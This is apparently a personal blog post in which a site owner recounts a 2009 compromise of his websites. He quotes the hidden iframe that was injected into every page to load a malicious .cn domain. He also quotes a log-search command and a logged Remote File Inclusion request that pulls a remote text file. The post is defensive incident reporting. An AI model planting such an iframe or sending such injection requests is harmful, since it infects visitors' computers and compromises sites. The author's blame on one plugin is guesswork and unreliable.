What just happened?
I woke up today to a complete nightmare. All of my websites were 'infected'. They were tagged by Google as malicious (and they were right this time). I had no idea what was going on. Google said the usual, this site may harm your computer etc. and then referred to all my sites as this domain 'litetopfindworld.cn'
Of course my first reaction was to blame my host, Media Temple, and assume I'd been hacked or something of the sort.
After sending a few angry messages to them (sorry about that), seems they had nothing to do with it. Essentially, it was my fault (sorry again). Of course, I had no idea what the source was, what it was doing, or how to rectify it.
Note this is at 10AM, and I have a class at noon, so I was pretty tense.
Eventually I find this : http://google.com/safebrowsing/diagnostic?tpl=safari&site=litetopfindworld.cn&hl=en-us which unfortunately means that anyone who visited any of the sites hosted on my server may have been infected with up to 212 trojans (I say *may* because I can't be sure - read further down the page I just linked to). Please run Ad-Aware or something of the sort. I sincerely apologize for this, but as you will find out it isn't completely my fault (but you can blame me anyways). Again, any anti-spyware program should do it. If you had an anti-virus running in the background, you should be alright, but do scan anyways. Mac users, you're fine, but if you're concerned go ahead and run MacScan.
So it seems this malicious code (do not visit the site below) :
<iframe src="http://litetopfindworld.cn/in.cgi?cocacola32" width=1 height=1 style="visibility: hidden"></iframe>
Was being added next to the <body> tag on all my pages. Essentially it was secretly loading a malicious webpage, which you wouldn't know of, unless you looked at the code, or Google stopped you (if you are logged in to your Google account while browsing, it automatically does, by default)
I managed to remove the line of code from all my sites manually. However, it kept reappearing on my blog.
At which point Media Temple's support staff asked me to SSH in and use this command to search for scripts that may have been infiltrated, using a method called Remote File Inclusion.
grep "?*=http://" ../../logs/access_log*| awk '/Jan/ && /libww/ && $9 !~/^4/'
Which returned :
../../logs/access_log-2009-01-30-12.processed:72.47.202.35 - - [30/Jan/2009:12:17:41 -0800] "GET /thedailysunrise.com/?_SERVER[DOCUMENT_ROOT]=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 37091 "-" "libwww-perl/5.79"
... and I didn't really know what it means. So I asked, turns out the source was my index.php file on thedailysunrise.com. There are two scripts on that page which could have been targeted for such an attack. One was Text-Link-Ads and the other was my Stats tracking, which was done by SlimStat.
If it was TLA, I would have received an e-mail to update my code. Thousands of people use it, and a vulnerability would spread fast and someone would say something. So it had to be SlimStat. I'm not exactly sure how it all worked, but the line of code that was on all my pages, to include SlimStat's function, was compromised, and injecting that line of code on all my pages, rendering all my websites dangerous.
So I got rid of SlimStat.
And now everything seems to be fine. Again, sorry to everyone affected, and Media Temple, for doubting them (again).
Time to ante my SSH skills.
